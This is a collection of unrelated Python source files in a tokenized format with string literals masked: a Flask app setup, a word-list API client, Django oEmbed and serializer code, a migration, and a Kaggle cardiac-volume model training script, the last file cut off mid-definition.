<s> import logging <EOL> import os <EOL> import sys <EOL> logging . basicConfig ( format = '<STR_LIT>' ) <EOL> logging . getLogger ( ) . setLevel ( logging . DEBUG ) <EOL> logging . disable ( logging . NOTSET ) <EOL> logging . info ( '<STR_LIT>' , __name__ , os . getenv ( '<STR_LIT>' ) ) <EOL> PRODUCTION = not os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) . startswith ( '<STR_LIT>' ) <EOL> DEBUG = not PRODUCTION <EOL> if not PRODUCTION : <EOL> import website . logcfg <EOL> website . logcfg . setup_logging ( ) <EOL> SRC_DIR = os . path . abspath ( os . path . dirname ( __file__ ) ) <EOL> LIB_DIR = os . path . join ( SRC_DIR , '<STR_LIT>' ) <EOL> if os . path . exists ( LIB_DIR ) : <EOL> for path in os . listdir ( LIB_DIR ) : <EOL> path = os . path . join ( LIB_DIR , path ) <EOL> if path . endswith ( "<STR_LIT>" ) and path not in sys . path : <EOL> logging . debug ( "<STR_LIT>" % path ) <EOL> sys . path . append ( path ) <EOL> if LIB_DIR not in sys . path : <EOL> logging . debug ( "<STR_LIT>" , LIB_DIR ) <EOL> sys . path . append ( LIB_DIR ) <EOL> TEMPLATE_FOLDER = os . path . join ( SRC_DIR , "<STR_LIT>" ) <EOL> STATIC_FOLDER = os . path . join ( SRC_DIR , "<STR_LIT>" ) <EOL> STATIC_URL = '<STR_LIT>' <EOL> try : <EOL> import flask_social_blueprint <EOL> except ImportError : <EOL> import sys <EOL> sys . path . append ( os . path . join ( os . path . dirname ( os . path . dirname ( SRC_DIR ) ) , "<STR_LIT:src>" ) ) <EOL> from flask import Flask <EOL> app = Flask ( __name__ , template_folder = TEMPLATE_FOLDER , static_folder = STATIC_FOLDER , static_url_path = STATIC_URL ) <EOL> app . debug = DEBUG <EOL> app . testing = DEBUG <EOL> if not PRODUCTION : <EOL> from google . appengine . tools . devappserver2 . python import sandbox <EOL> sandbox . _WHITE_LIST_C_MODULES += [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> import website . settings <EOL> app . config . from_object ( website . settings ) <EOL> config = "<STR_LIT>" if PRODUCTION else "<STR_LIT>" <EOL> import importlib <EOL> try : <EOL> cfg = importlib . import_module ( config ) <EOL> logging . debug ( "<STR_LIT>" % config ) <EOL> app . config . from_object ( cfg ) <EOL> except ImportError : <EOL> logging . warning ( "<STR_LIT>" , config ) <EOL> from flask_babel import Babel <EOL> babel = Babel ( app ) <EOL> import auth . models <EOL> auth . models . init_app ( app ) <EOL> import auth . views <EOL> app . register_blueprint ( auth . views . app ) <EOL> if app . debug : <EOL> from werkzeug . debug import DebuggedApplication <EOL> app . wsgi_app = DebuggedApplication ( app . wsgi_app , True ) <EOL> if not PRODUCTION : <EOL> @ app . before_request <EOL> def setup_wsgi_errors ( ) : <EOL> from flask import request <EOL> request . environ [ '<STR_LIT>' ] = sys . stderr </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import os <EOL> from models import * <EOL> class WordListApi ( object ) : <EOL> def __init__ ( self , apiClient ) : <EOL> self . apiClient = apiClient <EOL> def updateWordList ( self , permalink , auth_token , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> allParams = [ '<STR_LIT>' , '<STR_LIT:body>' , '<STR_LIT>' ] <EOL> params = locals ( ) <EOL> for ( key , val ) in params [ '<STR_LIT>' ] . iteritems ( ) : <EOL> if key not in allParams : <EOL> raise TypeError ( "<STR_LIT>" % key ) <EOL> params [ key ] = val <EOL> del params [ '<STR_LIT>' ] <EOL> resourcePath = '<STR_LIT>' <EOL> resourcePath = resourcePath . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> method = '<STR_LIT>' <EOL> queryParams = { } <EOL> headerParams = { } <EOL> if ( '<STR_LIT>' in params ) : <EOL> headerParams [ '<STR_LIT>' ] = params [ '<STR_LIT>' ] <EOL> if ( '<STR_LIT>' in params ) : <EOL> replacement = str ( self . apiClient . toPathValue ( params [ '<STR_LIT>' ] ) ) <EOL> resourcePath = resourcePath . replace ( '<STR_LIT:{>' + '<STR_LIT>' + '<STR_LIT:}>' , <EOL> replacement ) <EOL> postData = ( params [ '<STR_LIT:body>' ] if '<STR_LIT:body>' in params else None ) <EOL> response = self . apiClient . callAPI ( resourcePath , method , queryParams , <EOL> postData , headerParams ) <EOL> def deleteWordList ( self , permalink , auth_token , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> allParams = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> params = locals ( ) <EOL> for ( key , val ) in params [ '<STR_LIT>' ] . iteritems ( ) : <EOL> if key not in allParams : <EOL> raise TypeError ( "<STR_LIT>" % key ) <EOL> params [ key ] = val <EOL> del params [ '<STR_LIT>' ] <EOL> resourcePath = '<STR_LIT>' <EOL> resourcePath = resourcePath . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> method = '<STR_LIT>' <EOL> queryParams = { } <EOL> headerParams = { } <EOL> if ( '<STR_LIT>' in params ) : <EOL> headerParams [ '<STR_LIT>' ] = params [ '<STR_LIT>' ] <EOL> if ( '<STR_LIT>' in params ) : <EOL> replacement = str ( self . apiClient . toPathValue ( params [ '<STR_LIT>' ] ) ) <EOL> resourcePath = resourcePath . replace ( '<STR_LIT:{>' + '<STR_LIT>' + '<STR_LIT:}>' , <EOL> replacement ) <EOL> postData = ( params [ '<STR_LIT:body>' ] if '<STR_LIT:body>' in params else None ) <EOL> response = self . apiClient . callAPI ( resourcePath , method , queryParams , <EOL> postData , headerParams ) <EOL> def getWordListByPermalink ( self , permalink , auth_token , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> allParams = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> params = locals ( ) <EOL> for ( key , val ) in params [ '<STR_LIT>' ] . iteritems ( ) : <EOL> if key not in allParams : <EOL> raise TypeError ( "<STR_LIT>" % key ) <EOL> params [ key ] = val <EOL> del params [ '<STR_LIT>' ] <EOL> resourcePath = '<STR_LIT>' <EOL> resourcePath = resourcePath . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> method = '<STR_LIT:GET>' <EOL> queryParams = { } <EOL> headerParams = { } <EOL> if ( '<STR_LIT>' in params ) : <EOL> headerParams [ '<STR_LIT>' ] = params [ '<STR_LIT>' ] <EOL> if ( '<STR_LIT>' in params ) : <EOL> replacement = str ( self . apiClient . toPathValue ( params [ '<STR_LIT>' ] ) ) <EOL> resourcePath = resourcePath . replace ( '<STR_LIT:{>' + '<STR_LIT>' + '<STR_LIT:}>' , <EOL> replacement ) <EOL> postData = ( params [ '<STR_LIT:body>' ] if '<STR_LIT:body>' in params else None ) <EOL> response = self . apiClient . callAPI ( resourcePath , method , queryParams , <EOL> postData , headerParams ) <EOL> if not response : <EOL> return None <EOL> responseObject = self . apiClient . deserialize ( response , '<STR_LIT>' ) <EOL> return responseObject <EOL> def addWordsToWordList ( self , permalink , auth_token , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> allParams = [ '<STR_LIT>' , '<STR_LIT:body>' , '<STR_LIT>' ] <EOL> params = locals ( ) <EOL> for ( key , val ) in params [ '<STR_LIT>' ] . iteritems ( ) : <EOL> if key not in allParams : <EOL> raise TypeError ( "<STR_LIT>" % key ) <EOL> params [ key ] = val <EOL> del params [ '<STR_LIT>' ] <EOL> resourcePath = '<STR_LIT>' <EOL> resourcePath = resourcePath . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> method = '<STR_LIT:POST>' <EOL> queryParams = { } <EOL> headerParams = { } <EOL> if ( '<STR_LIT>' in params ) : <EOL> headerParams [ '<STR_LIT>' ] = params [ '<STR_LIT>' ] <EOL> if ( '<STR_LIT>' in params ) : <EOL> replacement = str ( self . apiClient . toPathValue ( params [ '<STR_LIT>' ] ) ) <EOL> resourcePath = resourcePath . replace ( '<STR_LIT:{>' + '<STR_LIT>' + '<STR_LIT:}>' , <EOL> replacement ) <EOL> postData = ( params [ '<STR_LIT:body>' ] if '<STR_LIT:body>' in params else None ) <EOL> response = self . apiClient . callAPI ( resourcePath , method , queryParams , <EOL> postData , headerParams ) <EOL> def getWordListWords ( self , permalink , auth_token , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> allParams = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> params = locals ( ) <EOL> for ( key , val ) in params [ '<STR_LIT>' ] . iteritems ( ) : <EOL> if key not in allParams : <EOL> raise TypeError ( "<STR_LIT>" % key ) <EOL> params [ key ] = val <EOL> del params [ '<STR_LIT>' ] <EOL> resourcePath = '<STR_LIT>' <EOL> resourcePath = resourcePath . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> method = '<STR_LIT:GET>' <EOL> queryParams = { } <EOL> headerParams = { } <EOL> if ( '<STR_LIT>' in params ) : <EOL> queryParams [ '<STR_LIT>' ] = self . apiClient . toPathValue ( params [ '<STR_LIT>' ] ) <EOL> if ( '<STR_LIT>' in params ) : <EOL> queryParams [ '<STR_LIT>' ] = self . apiClient . toPathValue ( params [ '<STR_LIT>' ] ) <EOL> if ( '<STR_LIT>' in params ) : <EOL> queryParams [ '<STR_LIT>' ] = self . apiClient . toPathValue ( params [ '<STR_LIT>' ] ) <EOL> if ( '<STR_LIT>' in params ) : <EOL> queryParams [ '<STR_LIT>' ] = self . apiClient . toPathValue ( params [ '<STR_LIT>' ] ) <EOL> if ( '<STR_LIT>' in params ) : <EOL> headerParams [ '<STR_LIT>' ] = params [ '<STR_LIT>' ] <EOL> if ( '<STR_LIT>' in params ) : <EOL> replacement = str ( self . apiClient . toPathValue ( params [ '<STR_LIT>' ] ) ) <EOL> resourcePath = resourcePath . replace ( '<STR_LIT:{>' + '<STR_LIT>' + '<STR_LIT:}>' , <EOL> replacement ) <EOL> postData = ( params [ '<STR_LIT:body>' ] if '<STR_LIT:body>' in params else None ) <EOL> response = self . apiClient . callAPI ( resourcePath , method , queryParams , <EOL> postData , headerParams ) <EOL> if not response : <EOL> return None <EOL> responseObject = self . apiClient . deserialize ( response , '<STR_LIT>' ) <EOL> return responseObject <EOL> def deleteWordsFromWordList ( self , permalink , auth_token , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> allParams = [ '<STR_LIT>' , '<STR_LIT:body>' , '<STR_LIT>' ] <EOL> params = locals ( ) <EOL> for ( key , val ) in params [ '<STR_LIT>' ] . iteritems ( ) : <EOL> if key not in allParams : <EOL> raise TypeError ( "<STR_LIT>" % key ) <EOL> params [ key ] = val <EOL> del params [ '<STR_LIT>' ] <EOL> resourcePath = '<STR_LIT>' <EOL> resourcePath = resourcePath . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> method = '<STR_LIT:POST>' <EOL> queryParams = { } <EOL> headerParams = { } <EOL> if ( '<STR_LIT>' in params ) : <EOL> headerParams [ '<STR_LIT>' ] = params [ '<STR_LIT>' ] <EOL> if ( '<STR_LIT>' in params ) : <EOL> replacement = str ( self . apiClient . toPathValue ( params [ '<STR_LIT>' ] ) ) <EOL> resourcePath = resourcePath . replace ( '<STR_LIT:{>' + '<STR_LIT>' + '<STR_LIT:}>' , <EOL> replacement ) <EOL> postData = ( params [ '<STR_LIT:body>' ] if '<STR_LIT:body>' in params else None ) <EOL> response = self . apiClient . callAPI ( resourcePath , method , queryParams , <EOL> postData , headerParams ) </s>
<s> """<STR_LIT>""" <EOL> class Syllable : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . swaggerTypes = { <EOL> '<STR_LIT:text>' : '<STR_LIT:str>' , <EOL> '<STR_LIT>' : '<STR_LIT:int>' , <EOL> '<STR_LIT:type>' : '<STR_LIT:str>' <EOL> } <EOL> self . text = None <EOL> self . seq = None <EOL> self . type = None </s>
<s> import os <EOL> from django . template import RequestContext , Context <EOL> from django . template . loader import render_to_string , select_template <EOL> from oembed . constants import CONSUMER_URLIZE_ALL <EOL> from oembed . utils import mock_request <EOL> class BaseParser ( object ) : <EOL> def render_oembed ( self , oembed_resource , original_url , template_dir = None , <EOL> context = None ) : <EOL> """<STR_LIT>""" <EOL> provided_context = context or Context ( ) <EOL> context = RequestContext ( context . get ( "<STR_LIT>" ) or mock_request ( ) ) <EOL> context . update ( provided_context ) <EOL> template_name = '<STR_LIT>' % oembed_resource . type <EOL> templates = [ os . path . join ( '<STR_LIT>' , template_name ) , '<STR_LIT>' ] <EOL> if template_dir : <EOL> templates . insert ( <NUM_LIT:0> , os . path . join ( '<STR_LIT>' , template_dir , template_name ) ) <EOL> template = select_template ( templates ) <EOL> context . push ( ) <EOL> context [ '<STR_LIT>' ] = oembed_resource <EOL> context [ '<STR_LIT>' ] = original_url <EOL> rendered = template . render ( context ) <EOL> context . pop ( ) <EOL> return rendered . strip ( ) <EOL> def parse ( self , text , maxwidth = None , maxheight = None , template_dir = None , <EOL> context = None , urlize_all_links = CONSUMER_URLIZE_ALL ) : <EOL> """<STR_LIT>""" <EOL> context = context or Context ( ) <EOL> context [ '<STR_LIT>' ] = maxwidth <EOL> context [ '<STR_LIT>' ] = maxheight <EOL> try : <EOL> text = unicode ( text ) <EOL> except UnicodeDecodeError : <EOL> text = unicode ( text . decode ( '<STR_LIT:utf-8>' ) ) <EOL> return self . parse_data ( text , maxwidth , maxheight , template_dir , <EOL> context , urlize_all_links ) <EOL> def parse_data ( self , text , maxwidth , maxheight , template_dir , context , <EOL> urlize_all_links ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def extract_urls ( self , text ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( '<STR_LIT>' ) </s>
<s> import sys <EOL> from os . path import dirname , abspath <EOL> from django . conf import settings <EOL> if not settings . configured : <EOL> settings . configure ( <EOL> DATABASE_ENGINE = '<STR_LIT>' , <EOL> ROOT_URLCONF = '<STR_LIT>' , <EOL> SITE_ID = <NUM_LIT:1> , <EOL> INSTALLED_APPS = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> ) <EOL> from django . test . simple import run_tests <EOL> def runtests ( * test_args ) : <EOL> if not test_args : <EOL> test_args = [ '<STR_LIT>' ] <EOL> parent = dirname ( abspath ( __file__ ) ) <EOL> sys . path . insert ( <NUM_LIT:0> , parent ) <EOL> failures = run_tests ( test_args , verbosity = <NUM_LIT:1> , interactive = True ) <EOL> sys . exit ( failures ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> runtests ( * sys . argv [ <NUM_LIT:1> : ] ) </s>
<s> import sys <EOL> sys . path . append ( '<STR_LIT:..>' ) <EOL> from SETTINGS import * ; <EOL> tag = <NUM_LIT:10> ; <EOL> fcn_img_size = <NUM_LIT> ; <EOL> net_version = <NUM_LIT:1> ; <EOL> heart_delta_multiplier = <NUM_LIT> ; <EOL> para_ss = <NUM_LIT> ; <EOL> do_cv = False ; <EOL> num_epochs = <NUM_LIT> ; <EOL> shift = <NUM_LIT:15> ; <EOL> rotation = <NUM_LIT:30> ; <EOL> scale = <NUM_LIT> ; <EOL> no_contour_type = '<STR_LIT:L>' ; </s>
<s> import pandas as pd ; <EOL> import SETTINGS as sts ; <EOL> from fitting_models import * <EOL> import analysis <EOL> def train_sex_age_model ( info , train_true ) : <EOL> print ( "<STR_LIT>" ) ; <EOL> sa_model = SexAgeModel ( ) ; <EOL> sa_model . fit ( info , train_true ) ; <EOL> sa_predict = sa_model . predict ( info ) ; <EOL> analysis . evaluate_pred ( sa_predict , train_true ) ; <EOL> return sa_predict ; <EOL> def train_ch4_model ( ch4_data , train_true ) : <EOL> print ( "<STR_LIT>" ) ; <EOL> ch4_model = Ch4Model ( ) ; <EOL> ch4_model . fit ( ch4_data , train_true ) ; <EOL> ch4_pred = ch4_model . predict ( ch4_data ) ; <EOL> analysis . evaluate_pred ( ch4_pred , train_true ) ; <EOL> return ch4_pred ; <EOL> def train_sax_model ( areas_all , train_true , version , cleaner = [ ] ) : <EOL> print ( "<STR_LIT>" ) ; <EOL> sax_model = SaxModel ( version = version ) ; <EOL> result = analysis . get_preliminary_volume ( areas_all , cleaner = cleaner ) ; <EOL> sax_model . fit ( result , train_true ) ; <EOL> sax_predict = sax_model . predict ( result ) ; <EOL> analysis . evaluate_pred ( sax_predict , train_true ) ; <EOL> return sax_predict ; <EOL> def train_sax_cnt_model ( areas_all , cont_all , train_true , version = <NUM_LIT:2> , cleaner = [ ] ) : <EOL> print ( "<STR_LIT>" ) ; <EOL> cnt_sax_model = SaxModel ( version = version ) ; <EOL> cnt_result = analysis . get_preliminary_volume_cnt ( areas_all , cont_all , cleaner = cleaner ) ; <EOL> cnt_sax_model . fit ( cnt_result , train_true ) ; <EOL> cnt_sax_predict = cnt_sax_model . predict ( cnt_result ) ; <EOL> analysis . evaluate_pred ( cnt_sax_predict , train_true ) ; <EOL> return cnt_sax_predict ; <EOL> def train_sax_cnt_filter_model ( areas_all , cont_all , train_true , cleaner = [ ] ) : <EOL> print ( "<STR_LIT>" ) ; <EOL> cnt_result = analysis . get_preliminary_volume_cnt_filter ( areas_all , cont_all , cleaner = cleaner ) ; <EOL> cnt_sax_model = SaxFilterModel ( ) ; <EOL> cnt_sax_model . fit ( cnt_result , train_true ) ; <EOL> cnt_sax_predict = cnt_sax_model . predict ( cnt_result ) ; <EOL> analysis . evaluate_pred ( cnt_sax_predict , train_true ) ; <EOL> return cnt_sax_predict ; <EOL> def train_oneslice_model ( areas_all , train_true ) : <EOL> print ( "<STR_LIT>" ) ; <EOL> oneslice_model = OneSliceModel ( ) ; <EOL> oneslice_model . fit ( areas_all , train_true ) ; <EOL> oneslice_predict = oneslice_model . predict ( areas_all ) ; <EOL> analysis . evaluate_pred ( oneslice_predict , train_true ) ; <EOL> return oneslice_predict ; <EOL> def build_default_model ( oneslice_pred , ch4_pred , sa_predict , p_1 = <NUM_LIT> ) : <EOL> print ( "<STR_LIT>" ) ; <EOL> default_pred = { } ; <EOL> def _bdm_ave ( x1 , x2 , x0 ) : <EOL> if np . isnan ( x1 [ <NUM_LIT:0> ] ) : <EOL> return x0 if np . isnan ( x2 [ <NUM_LIT:0> ] ) else x2 ; <EOL> elif np . isnan ( x2 [ <NUM_LIT:0> ] ) : <EOL> return x1 ; <EOL> return np . asarray ( [ x1 [ <NUM_LIT:0> ] * p_1 + x2 [ <NUM_LIT:0> ] * ( <NUM_LIT:1> - p_1 ) , min ( x1 [ <NUM_LIT:1> ] , x2 [ <NUM_LIT:1> ] ) ] ) ; <EOL> for case , value in sa_predict . iteritems ( ) : <EOL> pred1 = oneslice_pred . get ( case ) ; <EOL> pred2 = ch4_pred . get ( case ) ; <EOL> if pred1 is None : <EOL> pred1 = np . zeros ( <NUM_LIT:4> ) ; <EOL> pred1 [ : ] = np . nan ; <EOL> if pred2 is None : <EOL> pred2 = np . zeros ( <NUM_LIT:4> ) ; <EOL> pred2 [ : ] = np . nan ; <EOL> x = np . zeros ( <NUM_LIT:4> ) ; <EOL> x [ <NUM_LIT:0> : <NUM_LIT:2> ] = _bdm_ave ( pred1 [ <NUM_LIT:0> : <NUM_LIT:2> ] , pred2 [ <NUM_LIT:0> : <NUM_LIT:2> ] , value [ <NUM_LIT:0> : <NUM_LIT:2> ] ) ; <EOL> x [ <NUM_LIT:2> : <NUM_LIT:4> ] = _bdm_ave ( pred1 [ <NUM_LIT:2> : <NUM_LIT:4> ] , pred2 [ <NUM_LIT:2> : <NUM_LIT:4> ] , value [ <NUM_LIT:2> : <NUM_LIT:4> ] ) ; <EOL> default_pred [ case ] = x ; <EOL> return default_pred ; <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> cleaner = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] ; <EOL> info = pd . read_csv ( sts . output_dir + '<STR_LIT>' ) <EOL> ch4_data = { int ( r [ <NUM_LIT:0> ] ) : ( r [ <NUM_LIT:1> ] , r [ <NUM_LIT:2> ] ) for _ , r in <EOL> pd . read_csv ( sts . tencia_output_dir + '<STR_LIT>' , header = False ) . iterrows ( ) } ; <EOL> tencia_files = [ '<STR_LIT>' , '<STR_LIT>' ] ; <EOL> tencia_areas = [ analysis . get_cnn_results ( sts . tencia_output_dir + '<STR_LIT>' . format ( x ) ) for x in tencia_files ] ; <EOL> qifiles = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ; <EOL> qi_areas = [ analysis . get_cnn_results ( sts . output_dir + "<STR_LIT>" . format ( v ) ) for v in qifiles ] ; <EOL> qi_cnts = [ analysis . get_cnn_results ( sts . output_dir + "<STR_LIT>" . format ( v ) ) for v in qifiles ] ; <EOL> train_true = pd . read_csv ( sts . data_kaggle + '<STR_LIT>' ) ; <EOL> Ntrain = train_true . shape [ <NUM_LIT:0> ] ; <EOL> print ( "<STR_LIT>" . format ( Ntrain ) ) ; <EOL> filter_ll = - <NUM_LIT> ; <EOL> sa_predict = train_sex_age_model ( info , train_true ) ; <EOL> ch4_predict = train_ch4_model ( ch4_data , train_true ) ; <EOL> pick = [ <NUM_LIT:0> , <NUM_LIT:1> ] ; <EOL> qi_best , qi_best_cont = analysis . take_best_contour ( [ qi_areas [ i ] for i in pick ] , [ qi_cnts [ i ] for i in pick ] , method = <NUM_LIT:1> , filter_ll = filter_ll ) ; <EOL> oneslice_pred = train_oneslice_model ( qi_best , train_true ) ; <EOL> default_pred = build_default_model ( oneslice_pred , ch4_predict , sa_predict ) ; <EOL> analysis . evaluate_pred ( default_pred , train_true ) ; <EOL> tencia_best = analysis . take_best ( tencia_areas , method = <NUM_LIT:2> , filter_ll = - <NUM_LIT> ) ; <EOL> tencia_predict = train_sax_model ( tencia_best , train_true , version = <NUM_LIT:2> ) ; <EOL> pick = [ <NUM_LIT:0> , <NUM_LIT:1> ] ; <EOL> qi_best , qi_best_cont = analysis . take_best_contour ( [ qi_areas [ i ] for i in pick ] , [ qi_cnts [ i ] for i in pick ] , method = <NUM_LIT:1> , filter_ll = filter_ll ) ; <EOL> qi_sax_pred = train_sax_model ( qi_best , train_true , version = <NUM_LIT:2> , cleaner = cleaner ) ; <EOL> qi_sax_cnt_pred = train_sax_cnt_model ( qi_best , qi_best_cont , train_true , version = <NUM_LIT:2> , cleaner = cleaner ) ; <EOL> qi_sax_filter_pred = train_sax_cnt_filter_model ( qi_best , qi_best_cont , train_true , cleaner = cleaner ) ; <EOL> pick = [ <NUM_LIT:2> , <NUM_LIT:3> ] ; <EOL> qi_best , qi_best_cont = analysis . take_best_contour ( [ qi_areas [ i ] for i in pick ] , [ qi_cnts [ i ] for i in pick ] , method = <NUM_LIT:3> , filter_ll = filter_ll ) ; <EOL> qi_sax_pred2 = train_sax_model ( qi_best , train_true , version = <NUM_LIT:2> , cleaner = cleaner ) ; <EOL> qi_sax_cnt_pred2 = train_sax_cnt_model ( qi_best , qi_best_cont , train_true , version = <NUM_LIT:2> , cleaner = cleaner ) ; <EOL> qi_sax_filter_pred2 = train_sax_cnt_filter_model ( qi_best , qi_best_cont , train_true , cleaner = cleaner ) ; <EOL> pick = [ <NUM_LIT:4> , <NUM_LIT:5> ] ; <EOL> qi_best , qi_best_cont = analysis . take_best_contour ( [ qi_areas [ i ] for i in pick ] , [ qi_cnts [ i ] for i in pick ] , method = <NUM_LIT:1> , filter_ll = filter_ll ) ; <EOL> qi_sax_pred3 = train_sax_model ( qi_best , train_true , version = <NUM_LIT:2> , cleaner = cleaner ) ; <EOL> qi_sax_cnt_pred3 = train_sax_cnt_model ( qi_best , qi_best_cont , train_true , version = <NUM_LIT:2> , cleaner = cleaner ) ; <EOL> qi_sax_filter_pred3 = train_sax_cnt_filter_model ( qi_best , qi_best_cont , train_true , cleaner = cleaner ) ; <EOL> pick = [ <NUM_LIT:6> , <NUM_LIT:7> ] ; <EOL> qi_best , qi_best_cont = analysis . take_best_contour ( [ qi_areas [ i ] for i in pick ] , [ qi_cnts [ i ] for i in pick ] , method = <NUM_LIT:3> , filter_ll = filter_ll ) ; <EOL> qi_sax_pred4 = train_sax_model ( qi_best , train_true , version = <NUM_LIT:2> , cleaner = cleaner ) ; <EOL> qi_sax_cnt_pred4 = train_sax_cnt_model ( qi_best , qi_best_cont , train_true , version = <NUM_LIT:2> , cleaner = cleaner ) ; <EOL> qi_sax_filter_pred4 = train_sax_cnt_filter_model ( qi_best , qi_best_cont , train_true , cleaner = cleaner ) ; <EOL> print ( "<STR_LIT>" ) ; <EOL> all_models = [ qi_sax_pred , qi_sax_pred2 , qi_sax_pred3 , qi_sax_cnt_pred , qi_sax_cnt_pred2 , qi_sax_cnt_pred3 , qi_sax_filter_pred , qi_sax_filter_pred2 , qi_sax_filter_pred3 , qi_sax_pred4 , qi_sax_cnt_pred4 , qi_sax_filter_pred4 , tencia_predict , default_pred ] ; <EOL> ave_model = AverageModel ( ll = <NUM_LIT> ) ; <EOL> ave_model . fit ( all_models , train_true ) ; <EOL> ave_model . set ( ave_model . p * <NUM_LIT> ) ; <EOL> ave_pred = ave_model . predict ( all_models ) ; <EOL> final_pred = analysis . fill_default ( ave_pred , default_pred ) ; <EOL> analysis . evaluate_pred ( final_pred , train_true ) ; <EOL> analysis . make_submit ( final_pred , <NUM_LIT> , <NUM_LIT> , "<STR_LIT:test>" ) ; <EOL> analysis . save_intermediate ( final_pred , <NUM_LIT:1> , <NUM_LIT> , "<STR_LIT:test>" ) ; </s>
<s> from . views import * <EOL> from . serializers import * <EOL> from . renderers import * </s>
<s> from wq . db . patterns . base import serializers as base <EOL> from . models import Annotation <EOL> class AnnotationSerializer ( base . TypedAttachmentSerializer ) : <EOL> class Meta ( base . TypedAttachmentSerializer . Meta ) : <EOL> model = Annotation <EOL> class AnnotatedModelSerializer ( base . AttachedModelSerializer ) : <EOL> annotations = AnnotationSerializer ( many = True ) </s>
<s> from . serializers import * </s>
<s> from __future__ import unicode_literals <EOL> from django . db import migrations , models <EOL> class Migration ( migrations . Migration ) : <EOL> initial = True <EOL> dependencies = [ <EOL> ( '<STR_LIT:file>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( auto_created = True , primary_key = True , serialize = False , verbose_name = '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:name>' , models . CharField ( max_length = <NUM_LIT:255> ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> bases = ( '<STR_LIT>' , ) , <EOL> ) , <EOL> ] </s>
<s> from collections import MutableMapping , MutableSequence <EOL> class BaseIO ( MutableMapping , MutableSequence ) : <EOL> "<STR_LIT>" <EOL> tabular = False <EOL> nested = False <EOL> binary = False <EOL> def __init__ ( self , ** kwargs ) : <EOL> self . __dict__ . update ( kwargs ) <EOL> self . refresh ( ) <EOL> def refresh ( self ) : <EOL> self . load ( ) <EOL> if getattr ( self , '<STR_LIT>' , False ) : <EOL> self . data = [ ] <EOL> else : <EOL> self . parse ( ) <EOL> if hasattr ( self , '<STR_LIT:file>' ) and not self . file . closed : <EOL> self . file . close ( ) <EOL> def load ( self ) : <EOL> "<STR_LIT>" <EOL> pass <EOL> def parse ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def dump ( self , file = None ) : <EOL> "<STR_LIT>" <EOL> if file is None : <EOL> file = self . file <EOL> file . write ( str ( self . data ) ) <EOL> def save ( self ) : <EOL> "<STR_LIT>" <EOL> self . dump ( self . file ) <EOL> field_names = None <EOL> scan_fields = False <EOL> _auto_field_names = None <EOL> def get_field_names ( self ) : <EOL> "<STR_LIT>" <EOL> if self . field_names is not None : <EOL> if isinstance ( self . field_names , str ) : <EOL> return self . field_names . replace ( '<STR_LIT:U+002C>' , '<STR_LIT:U+0020>' ) . split ( ) <EOL> else : <EOL> return self . field_names <EOL> if not getattr ( self , '<STR_LIT:data>' , None ) : <EOL> return None <EOL> if self . _auto_field_names : <EOL> return self . _auto_field_names <EOL> if self . scan_fields : <EOL> field_names = set ( ) <EOL> for row in self . data : <EOL> field_names . update ( row . keys ( ) ) <EOL> field_names = list ( field_names ) <EOL> else : <EOL> field_names = list ( self . data [ <NUM_LIT:0> ] . keys ( ) ) <EOL> self . _auto_field_names = field_names <EOL> return field_names <EOL> @ property <EOL> def key_field ( self ) : <EOL> "<STR_LIT>" <EOL> return None <EOL> def get_key_field ( self ) : <EOL> return self . key_field <EOL> def usable_item ( self , item ) : <EOL> "<STR_LIT>" <EOL> return item <EOL> def parse_usable_item ( self , uitem ) : <EOL> "<STR_LIT>" <EOL> return uitem <EOL> def compute_index ( self , recompute = False ) : <EOL> key_field = self . get_key_field ( ) <EOL> if key_field is None : <EOL> return None <EOL> if getattr ( self , '<STR_LIT>' , None ) is not None and not recompute : <EOL> return self . _index_cache <EOL> index = { } <EOL> for i , item in enumerate ( self . data ) : <EOL> uitem = self . usable_item ( item ) <EOL> if isinstance ( uitem , dict ) : <EOL> key = uitem . get ( key_field , None ) <EOL> else : <EOL> key = getattr ( uitem , key_field , None ) <EOL> if key is not None : <EOL> index [ key ] = i <EOL> self . _index_cache = index <EOL> return index <EOL> def find_index ( self , key ) : 